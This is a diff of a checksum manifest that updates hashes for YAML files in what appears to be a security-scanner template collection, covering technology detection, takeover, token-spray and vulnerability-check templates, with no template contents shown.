http/osint/user-enumeration/pinkbike.yaml:7dcfb70c1c5c3ea7f825e51213a02ee3b689c2fa http/osint/user-enumeration/pinterest.yaml:9eaf491d742b2442c6de61543117a05c8989c39c -http/osint/user-enumeration/piratebay.yaml:bb7b0b1a62d53da95ae883ec6c72ebd8640c52b1 +http/osint/user-enumeration/piratebay.yaml:0c528d46f7bbd289b9b3ad1576981cc60b6dcef1 http/osint/user-enumeration/pixelfedsocial.yaml:2aa2c1d6fee4992154cc6e5168f0a3ffb9c70b4d http/osint/user-enumeration/platzi.yaml:24fdedd4333116082a5fd15bc291fc6c988f1cb0 http/osint/user-enumeration/playstation-network.yaml:8c63335825366ef99b3f5105c2df127e2ff7f071 @@ -6654,7 +6654,7 @@ http/takeovers/vercel-takeover.yaml:881400eef9e2d67febebc5bbb0ae8e8d40d190dd http/takeovers/wishpond-takeover.yaml:59ed0bc6dabc39d9915c45bea80c75ad96ee00c3 http/takeovers/wix-takeover.yaml:d3f8931c10d51d15a048f8ccd9c603b5f5164b5d http/takeovers/wordpress-takeover.yaml:6943a0158783833fd1797e7500e985be38acaefd -http/takeovers/worksites-takeover.yaml:2fe02b008a46eec6441587ec36660d49e3bdf8ba +http/takeovers/worksites-takeover.yaml:2293113a74da8408145f40466b6643cbc35bee91 http/takeovers/wufoo-takeover.yaml:aa7373517bcaebe9e5e7ec202f07dd7ed9b02efe http/takeovers/zendesk-takeover.yaml:a47ca9f517bc4450ee17132060e6c7e97ee07a07 http/technologies/4D-detect.yaml:4b948a54eb2718980daa15d0ce2aaf5ee1bf843b @@ -6675,7 +6675,7 @@ http/technologies/ambassador-edge-stack-detect.yaml:fcb8fa46e689fb4d35bb7fbd4be8 http/technologies/angular-detect.yaml:7719617c08923ab10058ecbc5d9fe19ff7195d77 http/technologies/ansible-awx-detect.yaml:44114d7cf04fcf41b49e86fee243b0c5ecc2ed2b http/technologies/apache/airflow-detect.yaml:36837eb295b1c7ffced3d9864087d6dac52969dd -http/technologies/apache/apache-answer-detect.yaml:417dd53d2faef9d8fa249ffcf067ea5b497b5af0 +http/technologies/apache/apache-answer-detect.yaml:48deef16a566d4847d23b77e4efcbc6d58690f8f http/technologies/apache/apache-axis-detect.yaml:55d59a4142e61ae3ead1bf03594767f59cac83dd http/technologies/apache/apache-cocoon-detect.yaml:773bd2977ddbb3403acfcd0f8e4cf10c81b84495 http/technologies/apache/apache-detect.yaml:1ec0c234a8a4487c59726af437b6eaa1fa249507 @@ -6690,14 +6690,14 @@ http/technologies/apache/default-apache2-page.yaml:3d32235cea4d966860cdac0d2832a http/technologies/apache/default-apache2-ubuntu-page.yaml:808d8b7991a7e1624b70d1fe1dcc452360318433 http/technologies/apache/kafka-manager-panel.yaml:dc3bc4035bc4069f3529349675f2c3e0ef6a1ede http/technologies/apache/ranger-detection.yaml:15fbdedf1fbe105e4bdbb03b8c6a449097801a74 -http/technologies/apache/tomcat-detect.yaml:cf27b004aa96ee81148b36eb005ef6eadf80c124 +http/technologies/apache/tomcat-detect.yaml:91e9fd95e5188f7b4529a787f1a7da29335c0647 http/technologies/apache/xampp-default-page.yaml:1a2e9ae4aef8adc79a4a34e693b351bfcc23f8f9 http/technologies/apollo-server-detect.yaml:44245d09c9ad3e3fbca5d699041ac2bd23d329f2 http/technologies/appcms-detect.yaml:1e4a5703053e47d171007ea981900427a88bfab6 http/technologies/apple-httpserver.yaml:17b86c19f29316954819f862cc7d1e371890f4cd http/technologies/aqua-enterprise-detect.yaml:50f08ae63f0b5b33a949ac9f0993afd4b05c589d -http/technologies/arcgis-rest-api.yaml:52c1328346001c13b75ab035f83530f9dc5b033c -http/technologies/arcgis-tokens.yaml:67a5b456e710a7f27f7922df046072f2d5e99c38 +http/technologies/arcgis-rest-api.yaml:eb38f25a45574cf0910230eb09622cdcff1e1e2b +http/technologies/arcgis-tokens.yaml:d087892af21c93134acc20508b0da86a0a46da92 http/technologies/artica-web-proxy-detect.yaml:8e2fe60b79816e54a4c63ab51115c99963ffefc2 http/technologies/atlassian-connect-descriptor.yaml:5135540c39e64c76e7eedb29fe59661fc878a676 http/technologies/autobahn-python-detect.yaml:bd44751b34cd25f8141cbed27c22f6e83707ccf4 @@ -6716,29 +6716,29 @@ http/technologies/bigbluebutton-detect.yaml:d0fecbfe3234220cfc43fd3f3ac058474e71 http/technologies/bigip-config-utility-detect.yaml:7132fa9fc894cb8fbf91eb0edb0736f59bc6c1fa http/technologies/bigip-detect.yaml:79ac84a48c9033805f48ded3907cbaf89b83e564 http/technologies/blazor-webassembly-detect.yaml:923ad3dec475cfd53301c625e493af2a0bc560db -http/technologies/boa-web-server.yaml:49f8d597e63286dd651c902559ae551d21b4fc87 +http/technologies/boa-web-server.yaml:2224840ec6f9fd808443c1cb2733fa62f1a3d319 http/technologies/burp-api-detect.yaml:c5e1c15a82e7f5f2c90464fafbc3da3cf7c5952e http/technologies/burp-collaborator-detect.yaml:1ba217f8c0b3d0587c8fb861468c229446175e83 http/technologies/carestream-vue-detect.yaml:8de6563e11009789749310748935b1181f1a5e31 http/technologies/casaos-detection.yaml:3d4fa5e3622cc7e1ca873ece5f52778bb29d124b http/technologies/catalog-creator-detect.yaml:29c6ac5e809037fd3d7c41f36cd7f60f5d4e907d -http/technologies/celebrus-detect.yaml:172493a61559e2bdf037bd9acf6e8b66779adb94 +http/technologies/celebrus-detect.yaml:38962e7f4cb0bf15734c51716d93e3938fdac548 http/technologies/checkpoint-mobile-detect.yaml:aa8c19bb4460fb790c6e602cc7add444baadb4c5 http/technologies/chevereto-detect.yaml:345e3c2aa446bd62b83764cd8ce28d05d1ef871f http/technologies/cisco-asa-detect.yaml:d207e04b41f9f0c314bd8fdebc56283e1f3776e7 http/technologies/citrix-hypervisor-page.yaml:7afcf2bffa7d9b1bae0cd67dff470853391a9c6f -http/technologies/citrix-xenmobile-version.yaml:e152a12dbf75dd390a88975b9549d2b522a163d2 +http/technologies/citrix-xenmobile-version.yaml:12d2188094ec3f374a0c617410f17d2b13c26c64 http/technologies/cloudflare-nginx-detect.yaml:3d7396b530a8ec2887ef61311ce28bc18a027be6 http/technologies/cloudfoundry-detect.yaml:75e8f4ba43f150caffee55712c363ca7b132d92c http/technologies/cobbler-version.yaml:f0c203b582efd7155ac74959ee3f532764e1faf5 http/technologies/cockpit-detect.yaml:27e5d04342b0c08de28aac0a3f7b7cc6b8e3dc3c http/technologies/coming-soon-page-detect.yaml:11bc0a870298c1a1cf414f677762ccba0a67c15d -http/technologies/confluence-detect.yaml:53cc7b709bac6d3829469606525114dec3ef253c +http/technologies/confluence-detect.yaml:7fb846da483c8f383a54ef5ee8f31e81952a2bf1 http/technologies/connectwise-control-detect.yaml:35b690093c8b71aa317417cd82264891dcbe277e http/technologies/couchbase-sync-gateway.yaml:f2ca1759ea3106b3f21b839b70fc52a23b67fcc3 -http/technologies/cowboy-detect.yaml:9c0974a01dc06a57665d2a6777b509edf3a2c1d5 +http/technologies/cowboy-detect.yaml:531b55d994e9e9bf23e6553aedbe18e3c6287c99 http/technologies/craft-cms-detect.yaml:b0c7e4f8f830ab3e2f599ee62975557f48a21559 -http/technologies/craftercms-detect.yaml:2fd20e108619d9583a087116209f3c447d6abec6 +http/technologies/craftercms-detect.yaml:54b1154ef84ca7f0d830b89bb7cb3e34bdeb6478 http/technologies/csrfguard-detect.yaml:7a0e3757762d2336706a42a0e0218391624b96a6 http/technologies/cvsweb-detect.yaml:37d98f3ac251889862ae9937d35ac9823e7ccd94 http/technologies/dash-panel-detect.yaml:018b9e3b920a2b3622e740c9d022499ab09fe0c8 @@ -6792,13 +6792,13 @@ http/technologies/elfinder-version.yaml:7accad5837b103bfd8db4741908f54266f53c377 http/technologies/empirecms-detect.yaml:2ace0c88b102d03ecd6ae9560b57a5ae793a81c3 http/technologies/emqx-detect.yaml:a5536ebfc8abbd2696c10fc7cc9cff05ca0f9c18 http/technologies/erigon-server-detect.yaml:047c6a189dd4a9f32e09a4c657dfcbef4632a4de -http/technologies/erxes-detect.yaml:f8b6f455bfc8d62f769fe1603075766e9bbcfb01 +http/technologies/erxes-detect.yaml:0b0c912b19bcc8a47d772dc4a0ad62f1b2ee575a http/technologies/express-default-page.yaml:9b9f3123a71fc406485c40ac371af6052c9bcb03 http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872508c http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:c4e7bbeee04fbae29183ae8edd2978a693c039d1 +http/technologies/favicon-detect.yaml:dac4eb2a45804f38bf1f8089cbe0463934d72599 http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/gabia-server-detect.yaml:194d560530bd2f19ab14523319f46dd7ef3757d8 @@ -6826,13 +6826,13 @@ http/technologies/graylog/graylog-api-exposure.yaml:d101cae7fd923dd7f233bf27e3a9 http/technologies/graylog-api-browser.yaml:5aaa8bff99b57cf700d0923b48778048789f2389 http/technologies/gunicorn-detect.yaml:4e32fda7d9483af8c21fd3ea7fa6669266e23d0d http/technologies/hanwang-detect.yaml:4866144f96b1fbc18567e10ad7732b8a1a8dfc5f -http/technologies/harbor-detect.yaml:b24bc81192a9ac1734b8c085937f370a91a9d192 +http/technologies/harbor-detect.yaml:161166f4d13728bce9453ae6fdf71e898e545f7c http/technologies/hashicorp-boundary-detect.yaml:2c9cd04eb04b04ab434269134e10942d9b1aad47 http/technologies/hashicorp-vault-detect.yaml:2dd03598584787e150e41151b8a4a726e6daa687 http/technologies/hcpanywhere-detect.yaml:32387aaad25f3dbf7df0b814110c21bc268b7ab1 http/technologies/herokuapp-detect.yaml:e671a5e1156e0f6349314635c773b4a6a96befb3 http/technologies/hetzner-cloud-detect.yaml:6b71f9f3998ea8a3592e922e856f69bed1eae5f8 -http/technologies/hikvision-detect.yaml:caf364aeaabd462789824cb63f9e878c2f63e385 +http/technologies/hikvision-detect.yaml:ede898f6fda7ad92a08b07274a8a7edd1bee5d35 http/technologies/honeypot-detect.yaml:1ab63306f97127ca33774b087fadcb7d011122d6 http/technologies/hp-blade-admin-detect.yaml:378be4aab639b60a325401ab7b57a689525ed2f5 http/technologies/hp-media-vault-detect.yaml:f5d2864ba5eb7c6a60c239f000c64f915fc7a474 @@ -6857,9 +6857,9 @@ http/technologies/ispyconnect-detect.yaml:824d28bf59ef67a8eaedaa3743ae1be8292d12 http/technologies/jboss-detect.yaml:21aa64a158ad1c97c1436ad116d277408838a917 http/technologies/jeecg-boot-detect.yaml:1f321b7a82e55cdeb7381eeb59060306e1fc2359 http/technologies/jellyfin-detect.yaml:7bdc3dd295f112b2c127c38587074fe23ec192f1 -http/technologies/jenkins-detect.yaml:76ce840846ac04f25df4ef5d554eed619293ddab +http/technologies/jenkins-detect.yaml:6486ba26d2e2c64f77bef1772914b5148a8bfbaa http/technologies/jhipster-detect.yaml:c30efd85cc3be85bddd0334522698cb9bb7a7b2b -http/technologies/jira-detect.yaml:5a5eceeb12b7b62021f30d310de74bb404e2a636 +http/technologies/jira-detect.yaml:61ee3c24fd2e38ebe735a25b2a323fc1b1421e25 http/technologies/jira-serverinfo.yaml:5bc63395a7de1624c7598f8371b97e6e7588bd7f http/technologies/jitsi-meet-detect.yaml:4b5e0d3b2a0b39491d0827543aeeec45e2f7da27 http/technologies/jolokia-detect.yaml:b21975c3f9dc9f3e387c650a408509bcaface247 @@ -6902,9 +6902,9 @@ http/technologies/maian-cart-detect.yaml:04535015f709d487931505967e5b18023229a19 http/technologies/mappproxy-detect.yaml:34f8715bb04d15e410646087f140852d5e67e6a4 http/technologies/matrix-detect.yaml:33b6e2aef92cf34e8fdfa015ed1d7c4cbb0c9ca7 http/technologies/matrix-homeserver-detect.yaml:03f44055b1385667e1d860c9160c9b0a3b5b24b0 -http/technologies/meilisearch-detect.yaml:e14f19629d33e8d2128a8996cc575c97078b6512 +http/technologies/meilisearch-detect.yaml:2bf174b1e35c2eb58aabcdf4e626d47b9ddd7d1f http/technologies/metatag-cms.yaml:dddeec9fe5817ce89ce12c7fb09e5702c6cf5ea7 -http/technologies/microfocus-iprint-detect.yaml:3e748129a135a253919474618cb487b6de137ae7 +http/technologies/microfocus-iprint-detect.yaml:2a71fa3b1e711962a5fb47d0700f2f2a1f776d51 http/technologies/microsoft/aspnet-version-detect.yaml:e37201ff3f26965873974a21c6bd351a7cbe851c http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:8f445b5529fb0bb219994e249b2cc3aa4e868f97 http/technologies/microsoft/default-iis7-page.yaml:c4e22ee6e9c969c526ea2609a510a8e23150963d @@ -6916,12 +6916,12 @@ http/technologies/microsoft/ms-exchange-server.yaml:2853996419599aad62fb3b09214e http/technologies/microsoft/sql-server-reporting.yaml:f09e2468fe44fbccafc12b034f080bee81f7c7e8 http/technologies/microsoft-iis-8.yaml:d412acda7d62b6b9aaf243b16ba4c2fbfbf023ba http/technologies/microstrategy-detect.yaml:02eafd1137a771e38088c944bd4f1566fdd0cf48 -http/technologies/microweber-detect.yaml:87f415d673ece633fd9531ad5fd097e7a4524191 +http/technologies/microweber-detect.yaml:3ad6ea0402fc4fa813dea5d14501118f8a98de9c http/technologies/mikrotik-httpproxy.yaml:2cb432a260cc4204811fe93e541c109ec93f85a3 http/technologies/moinmoin-detect.yaml:04db6100af908c8250ad5b8345437d55c1e1acc4 http/technologies/mojoportal-detect.yaml:db1e2829787dfe997e7e06790e3331d34105ab1c http/technologies/mongoose-server.yaml:9f0cacffd406e182059c826e71b5592db087ea9d -http/technologies/monstracms-detect.yaml:388ca445fed5dac2c13c0c18f26b164c17142c17 +http/technologies/monstracms-detect.yaml:ceed5f23372e91f704f11a6a4db9b33340a8fb84 http/technologies/moveit-transfer-detect.yaml:2744d9bbad9ae50abef1c6523998f3b64c623268 http/technologies/mrtg-detect.yaml:1b41717cf1bb1618aa6f8a359593b98cb81f2ace http/technologies/nacos-version.yaml:46e9e392ebfe74702da3bf3f491e3487691d990e @@ -6977,10 +6977,10 @@ http/technologies/php-proxy-detect.yaml:f5ddbec73878b9aca62225ca3d2253aa05c08b07 http/technologies/phplist-detect.yaml:bcf5b654336e6023bcab4d5c11a0b04cdee61dbe http/technologies/phppgadmin-version.yaml:01085231f960e8d430be7cfcab3768179dce831c http/technologies/pi-hole-detect.yaml:cab952d31f64be976ed57205910333ae2a5fa8ed -http/technologies/piwigo-detect.yaml:1bcf56922b807d2fb6acd8987766554a3438b1ec +http/technologies/piwigo-detect.yaml:d57ef36f96ea881bbf8c0678724f6a0d554fcd79 http/technologies/plone-cms-detect.yaml:ab9d4e68a0930c0cb77fc0445be1bfcf049c3828 http/technologies/prestashop-detect.yaml:ae5c760f32da59a5d0555376718e4ea7fa757757 -http/technologies/privatebin-detect.yaml:8299a82c435a83a50f6465252c6c2cd576181e43 +http/technologies/privatebin-detect.yaml:fb7ad930ace0f3996db14272e91c039a176b3cf1 http/technologies/projectsend-detect.yaml:83d96a89dadbb639988965f3c0f3d354157687cb http/technologies/prtg-detect.yaml:0726d92760582f166069dc45e6092915578a0cb9 http/technologies/puppet-node-manager-detect.yaml:5a065363e512f21b6ef1acb9f5d4fb902529b61d @@ -6997,9 +6997,9 @@ http/technologies/rsshub-detect.yaml:78befe0bfa5036aea006bfb433aa5e8b20f6eb5e http/technologies/s3-detect.yaml:17054560fae17482a2b175a5c0c9baad426c5a6a http/technologies/samsung-smarttv-debug.yaml:25586370a97a672fd2bb066dd4d5fd6c671e4302 http/technologies/sap/sap-igs-detect.yaml:3023bc9a78e2e76f340362a467fd237d2a24ef9e -http/technologies/sap/sap-netweaver-detect.yaml:8638423cbd65d2b27a0c0ffdd0ab7eabdb531495 +http/technologies/sap/sap-netweaver-detect.yaml:04f11147b8f362cc9e023295ad8c818ed46cc797 http/technologies/sap/sap-netweaver-webgui.yaml:44bdfe780e8dd940ce87f592cb74595e0ea9b052 -http/technologies/sap/sap-web-dispatcher-admin-portal.yaml:9105dbd81b51a0d4ba1902d21c69e35bd6103e0f +http/technologies/sap/sap-web-dispatcher-admin-portal.yaml:bfca51a97a962044a1b391a884655d446d840b90 http/technologies/sap/sap-web-dispatcher.yaml:c54fcf650d5eb35ed5f774056cb21cee58392944 http/technologies/sap-spartacus-detect.yaml:7bf3be4dd73c1031a1e0012aecbde99debab1fb0 http/technologies/sceditor-detect.yaml:76aed54be1a2fe79bf32be3fc64136d0f404adaa @@ -7009,7 +7009,7 @@ http/technologies/shiro-detect.yaml:fdd9cf265ac09bccd909fa9538aea8c5a34075ca http/technologies/shopizer-detect.yaml:b1681a16e1e4f32044c70a93a551b501c9c86f01 http/technologies/shopware-detect.yaml:ad3d9219bc09efdf0f6367a12026b0dcfc51d649 http/technologies/silverback-detect.yaml:4fac33868fb87a978868ec84781eed0a7c30d49f -http/technologies/simplesamlphp-detect.yaml:24553b4b0db750aaf9417edfb2929d5f0ffc3cc4 +http/technologies/simplesamlphp-detect.yaml:2e78448a999c7548cdc99a0a2178dea21da7131e http/technologies/sitecore-cms.yaml:8a27a32d980713495019103caf5c8b554f8ef999 http/technologies/sitecore-version.yaml:9c29aaa579ff443a846d20c507e207516ad0c581 http/technologies/smartstore-detect.yaml:fd46585986df71b3c7aeaa78b6aa277632e60828 @@ -7017,7 +7017,7 @@ http/technologies/smtp2go-detect.yaml:6019a0c74e3488774d4f3909ee47c17cf6f5490b http/technologies/snipeit-panel.yaml:aeed56e720ca069ccc5fffae2c3a77a93642c89b http/technologies/sogo-detect.yaml:12c9d0bda8f9ed788ffc1ff04aca07cf08a21646 http/technologies/sonicwall-email-security-detect.yaml:661f432cedd68b0aacd6ef82aaf5fbfcb9c03281 -http/technologies/sparklighter-detect.yaml:a7d7bccd6403f02fb07d0748e7fc8ef80c1aa600 +http/technologies/sparklighter-detect.yaml:9a7f83ebd9f0e45a8e5d239e74956994226552c4 http/technologies/spinnaker-detect.yaml:1e4b0cf0ce948c69e22a6d1022e8065c23a9f072 http/technologies/splash-rendering-service.yaml:31a8465843cc494d2146c66dce532bf6ce4cc2b0 http/technologies/splunkhec-detect.yaml:b12fe8414a25f23ca27add683cf845cbb65c3f93 @@ -7040,13 +7040,13 @@ http/technologies/terraform-detect.yaml:4a6b07500d51b57236a3c031303ea69d3d908cc0 http/technologies/thinkcmf-detect.yaml:5c0ed06525200107f34c86179603d51b2e3766cd http/technologies/thinkphp-detect.yaml:4f4c4b8bb5ea605c7dd26335d710811935db624d http/technologies/tibco-businessconnect-detect.yaml:df1e040bbfa4c989246929173292176c9f5e3137 -http/technologies/tibco-spotfire-services-detect.yaml:f3eb5451b248349831da2b416b874ff1069a8ed9 +http/technologies/tibco-spotfire-services-detect.yaml:6c56f0e60e1cbe30ef382f1253ab32e81f14875d http/technologies/tileserver-gl.yaml:27fe637c0f3de39676585f41d5980e246441bdab http/technologies/tinyproxy-detect.yaml:1f12faf3ae2dd38f5c8f0aed9753d65ce611b795 http/technologies/tor-socks-proxy.yaml:ad664f3598d1039dd335f4128e1cb81ceeef4864 http/technologies/tornado-server-login.yaml:7d8148d6ca18ef79abc33aceacbf8dbafd31d4d4 http/technologies/typo3-detect.yaml:206df0bc720861958780557535b8b4693ec64636 -http/technologies/uni-gui-framework.yaml:0112ec2daa09fac04af443ac81329f39cd5a20c7 +http/technologies/uni-gui-framework.yaml:c842f7bdc4e249630ae74540ad5f56301708d8cd http/technologies/utility-service-detect.yaml:c6754cc4daf389f30429c27e153462cc4b5f65a4 http/technologies/vbulletin-detect.yaml:a48f02b03dc57037391b6c02e06f20906b9d9015 http/technologies/versa/versa-analytics-server.yaml:ab6b798c55d8379b64cd1bc97b70ee6377f151e5 @@ -7281,8 +7281,8 @@ http/technologies/wordpress/plugins/wps-hide-login.yaml:49e23dfebb88ab4c3822f56d http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:74b65c6c5ca927a3cc48713f2e12af3315585a02 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:b585238fc372f9d7131fb53c9bde96f0c8224553 -http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:cdc04aa3d389240302b88aff200be0d24d8e1037 -http/technologies/wordpress-detect.yaml:5d45f8912531a6f38c6c4c95a9b5f5e25f7ac363 +http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e +http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f http/technologies/wso2-products-detect.yaml:810c03f8a2986fd7939b83bca35b9a6f95196a63 http/technologies/wuzhicms-detect.yaml:42d61fccbe91af74c18090d30a93945513224b1d @@ -7291,7 +7291,7 @@ http/technologies/xerox-workcentre-detect.yaml:a3cd237c046d00b80d6abfb0909307ed4 http/technologies/yapi-detect.yaml:eee614bcb01abb87d877683d90a0474881c08830 http/technologies/yeswiki-detect.yaml:6dfae92602cea1093b6b4bb50e1e06aad5209265 http/technologies/ymhome-detect.yaml:76dac1f59e7e5efb41a3911f7add03731d0dcc76 -http/technologies/yourls-detect.yaml:d6da6239dc6dd1bd52d193db30612974840d5a3a +http/technologies/yourls-detect.yaml:9e6c0af6305da7b6fc6908029bb0f50e71244b18 http/technologies/zap-api-detect.yaml:f201d2fd86330dd738f8f47d22af3b532fc1e5cd http/technologies/zend-server-test-page.yaml:7c9ca127df0c8b3386b8e1647e21a14aa6dfbbd7 http/technologies/zerof-webserver-detect.yaml:abe201e6635a2c6b40f4d6ae69cdf101abb0a9a1 @@ -7423,7 +7423,7 @@ http/token-spray/api-lokalise.yaml:6df4f64b17f96e4742bd735271a8ee0de4a28570 http/token-spray/api-loqate.yaml:eda1d23f54cc5869dcdd8f07019609f4389635be http/token-spray/api-mac-address-lookup.yaml:50a21c925263aa4caf9b60bae4c90c75ab382e12 http/token-spray/api-mailboxvalidator.yaml:95ad72a1af48525ac8b29f71fdfc3c6a7a724baf -http/token-spray/api-mailchimp.yaml:6c48cede34aabddc30a3ce1e61154e62be6ca167 +http/token-spray/api-mailchimp.yaml:75bedce2b2c5cc1ab7363b94a7d219e05fa45d4d http/token-spray/api-mailgun.yaml:8cae98f9ea11186c69007d6d2e462e3769d80073 http/token-spray/api-malshare.yaml:d3b03af5eaf8940240a7e42db96c1ed782db67f9 http/token-spray/api-malwarebazaar.yaml:0f6b07e953eee462f8710c23f25337ae393de580 @@ -7477,7 +7477,7 @@ http/token-spray/api-scrapingdog.yaml:36ec01b41847600aa7f9ed05803dd8f4512f78b7 http/token-spray/api-screenshotapi.yaml:23811c030da5191d10880ff1ca3702e804d51738 http/token-spray/api-securitytrails.yaml:44f62cc4ec23b27f88b04f2fe1cb0c75ff9c05a7 http/token-spray/api-segment.yaml:63b895eba7eb64c444fae6395fc62d771927d1fd -http/token-spray/api-sendgrid.yaml:d42501bbd5841d92ccdb3b99f0d49323f12bb8bc +http/token-spray/api-sendgrid.yaml:b587e591da451481ef2045c1ef004f50c8aac1c5 http/token-spray/api-sentry.yaml:c27b4ac6a50680ea817425649ebf3207f47a1b41 http/token-spray/api-serpstack.yaml:8b0856f6dd8f6c8aba7b037e7bc5ca69719e88f8 http/token-spray/api-shodan.yaml:3a23a419b00daa03036abcdb962ad4aac430d158 @@ -7499,7 +7499,7 @@ http/token-spray/api-ticketmaster.yaml:21b22b55f4944da088d0090ee63ccfceb423054b http/token-spray/api-tink.yaml:1eb860865a853677d11a557f5ebebcd64c51c362 http/token-spray/api-tinypng.yaml:281a485188c27b7d0a2fc8a5809fb7d29bc836d1 http/token-spray/api-todoist.yaml:127ffd4ab0f50fe44c3ed4083b50068273d4752a -http/token-spray/api-travisci.yaml:8e3f417012d115ed68f99727dc896cc92b913e4b +http/token-spray/api-travisci.yaml:e1b16147cffc39cbd7d2f645f6d33b37178f8fcf http/token-spray/api-trello.yaml:80802bc415db7de5e5b1a2782c89a23e9eaa7efe http/token-spray/api-twitter.yaml:e4b8e7eb6ef921c659bb5495fd7631459779dd0f http/token-spray/api-urlscan.yaml:27c156eadbeca24e739d7df33fc78bfc2a8fd9ee @@ -7558,7 +7558,7 @@ http/vulnerabilities/avtech/avtech-dvr-ssrf.yaml:cc5b00277d590083d64dddf48f7c507 http/vulnerabilities/avtech/avtech-unauth-file-download.yaml:8d35ad8973b365783595f5a25a26e469d6aae45c http/vulnerabilities/avtech/avtech-verification-bypass.yaml:86e688a4d783b621c2b7340676a320b542376eaf http/vulnerabilities/backdoor/antsword-backdoor.yaml:66bca1b81f43577f983c1b4bb437dec48dc60bad -http/vulnerabilities/backdoor/cisco-implant-detect.yaml:40e6f665b63b4acd360b74d0e45387038c904f32 +http/vulnerabilities/backdoor/cisco-implant-detect.yaml:a90d6d22a4c2ec83475db0efe7a35840362d1e18 http/vulnerabilities/backdoor/fatpipe-backdoor.yaml:79c76afb42389be4634d42777a1d4bd0cfa26f34 http/vulnerabilities/backdoor/jexboss-backdoor.yaml:97064905cdfd019872ba00fdf7284438d314bb15 http/vulnerabilities/backdoor/kevinlab-bems-backdoor.yaml:40fe980d103f1d5051cba7c2f1d78897dd98d891 @@ -7574,7 +7574,7 @@ http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml:603bb5279bc4d http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml:ea1ab53653cf1c170515c6ee5e6867b76f167b01 http/vulnerabilities/cisco/cisco-webex-log4j-rce.yaml:aef89b607f0527340246a54d607fb5a0c4533d5e http/vulnerabilities/cisco/cucm-username-enumeration.yaml:8f1f34c21c46c88b1faf80e11363097dc18d7c03 -http/vulnerabilities/citrix/citrix-oob-memory-read.yaml:8691b5b9f846049c470e548f0d34528c00455b90 +http/vulnerabilities/citrix/citrix-oob-memory-read.yaml:b373ed667902bbba280aa529210fff81e618a42a http/vulnerabilities/code42/code42-log4j-rce.yaml:c6eca1ad5491f3ab51671acd9067242f3f77767e http/vulnerabilities/concrete/concrete-xss.yaml:85b12fb54e5f98736f4bc70df764384fe675f2f2 http/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml:305c4b65dec3bc65e31fcd5c0b72a9841e630064 @@ -7595,8 +7595,8 @@ http/vulnerabilities/discuz/discuz-api-pathinfo.yaml:4cd287eda013330adf57a16f49f http/vulnerabilities/dlink/dlink-netgear-xss.yaml:58360dabdb688a1d3a316ffcb1bf3d67b39eb416 http/vulnerabilities/drupal/drupal-avatar-xss.yaml:1058d534d63fdae5e60b8a97cb170499e4c4ac1e http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml:9edd51637c886ca03c88cbdedca3033fb842b81e -http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml:3294b1534484babae5d8ca0d07133781d7942c63 -http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml:7314c8456970e5a94ecff7456efb67fabad5aad4 +http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml:57ff09d4d4fff6e542ff32d08f76b9e6bf381db7 +http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml:8f5cfb4aee686e8c11ebae13cadbc21f89277b97 http/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml:d1e90625be0514d41048bed71a21e367556b4d4f http/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml:2ef0518658108401b361842897fd0a98f6e6d94d http/vulnerabilities/fastjson/fastjson-1-2-42-rce.yaml:05bbdb4a1987dc14d013b1b33d82c630b4838b79 @@ -7639,7 +7639,7 @@ http/vulnerabilities/hikvision/hikvision-ivms-file-upload-rce.yaml:94de4453e34e7 http/vulnerabilities/hikvision/hikvision-js-files-upload.yaml:cdcf6ca5518af130ebd36c1531365f6bb79001c5 http/vulnerabilities/httpbin/httpbin-open-redirect.yaml:1b66933da5367fcad1de79ed46e41dd9b6b4543a http/vulnerabilities/httpbin/httpbin-xss.yaml:b8072d3dcf45a6ca85ef27483281733357126da7 -http/vulnerabilities/huatian/huatian-oa-sqli.yaml:88b3f3b3d5693ed5681d729048e3e99532075618 +http/vulnerabilities/huatian/huatian-oa-sqli.yaml:f4f35ad79e01a4fde957a9c16e13167c085e0341 http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml:dbd647cefaf1c14ab1e9f62163272f5b9e8077f4 http/vulnerabilities/huawei/huawei-firewall-lfi.yaml:26c4256fc8f7f9aca152325a69201d40114e7ded http/vulnerabilities/huawei/huawei-hg255s-lfi.yaml:b04f892fc063564b2037ab47afc68fdcb53e9104 @@ -7677,10 +7677,10 @@ http/vulnerabilities/joomla/joomla-marvikshop-sqli.yaml:b348e4689a5a11c4cf8fbd01 http/vulnerabilities/joomla/joomla-marvikshop-xss.yaml:6be8e5607bc2d797c23d1148699f53d6efabc780 http/vulnerabilities/joomla/joomla-solidres-xss.yaml:1822aa529ef26cc67005273a28c63d61962e1cfd http/vulnerabilities/joomla/rusty-joomla.yaml:768286c88d23466fcfcd3e2538b9b170f70d2720 -http/vulnerabilities/jorani/jorani-benjamin-xss.yaml:848d1990b5df6f08d133d289cad7f13c02c59755 +http/vulnerabilities/jorani/jorani-benjamin-xss.yaml:a4cac1b6c58a998230a629a6c49e75312ac4b860 http/vulnerabilities/juniper/junos-xss.yaml:2fb77ffeeb6be6b060134ad475574168fbc7dacb 